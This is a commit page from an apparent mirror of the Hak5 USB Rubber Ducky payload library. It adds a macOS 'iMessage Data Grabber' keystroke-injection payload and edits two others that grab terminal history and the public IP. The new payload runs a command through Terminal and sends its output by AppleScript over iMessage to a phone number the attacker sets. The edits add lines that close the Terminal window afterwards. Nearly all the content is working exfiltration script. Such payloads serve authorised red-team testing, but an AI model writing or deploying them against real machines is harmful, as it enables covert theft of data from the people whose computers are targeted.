hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #45 from matthewkayne/master 

Added iMessage data grabber payload
pull/46/head
Darren Kitchen 2022-03-01 17:41:29 -06:00 committed by GitHub
parent 1b19803dbe b9d7542576
commit 3abbae1334
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 38 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
payloads/library/exfiltration/History-Grabber/payload.txt
View File

@ -1,6 +1,6 @@
REM Title: Terminal History Grabber
REM Description: Extracts the terminal history of the device onto the ducky
REM Author: Matthew Kayne
REM Author: matthewkayne
REM Category: Exfiltration
REM Target: macOS (Terminal)
REM Requires: Twin Duck firmware or separate USB stick (requires change to the path of the file)
@ -17,3 +17,7 @@ DELAY 100
ENTER
DELAY 200
ENTER
DELAY 200
GUI w
DELAY 200
ENTER

6
payloads/library/exfiltration/Public-IP-Grabber/payload.txt
View File

@ -1,6 +1,6 @@
REM Title: Public IP Grabber
REM Description: Extracts the public IP address of the current connected network onto the ducky
REM Author: Matthew Kayne
REM Author: matthewkayne
REM Category: Exfiltration
REM Target: macOS (Terminal)
REM Requires: Twin Duck firmware or separate USB stick (requires change to the path of the file)
@ -16,3 +16,7 @@ STRING dig +short txt ch whoami.cloudflare "1.0.0.1 > /Volumes/DUCKY/public-ip.t
ENTER
DELAY 200
ENTER
DELAY 200
GUI w
DELAY 200
ENTER

28
payloads/library/exfiltration/iMessage-Data-Grabber/payload.txt Normal file
View File

@ -0,0 +1,28 @@
REM Title: iMessage Data Grabber
REM Description: Sends any command output to an iMessage receiving number (this example grabs the devices IP)
REM Author: matthewkayne
REM Category: Exfiltration
REM Target: macOS (Terminal)
REM Requires: Device with iMessage to receive the data
DELAY 1000
GUI SPACE
DELAY 400
STRING Terminal
DELAY 200
ENTER
DELAY 200
REM Change this command inside the brackets too any command that outputs text to the terminal
STRING x=$(curl ifconfig.me)
DELAY 200
ENTER
DELAY 200
REM Replace PHONE_NUMBER with you iMessage supported number (leave the @'s, they are required to run)
STRING osascript -e 'tell application @Messages@ to send @'$x'@ to buddy @PHONE_NUMBER@'
DELAY 100
ENTER
DELAY 200
GUI w
DELAY 200
ENTER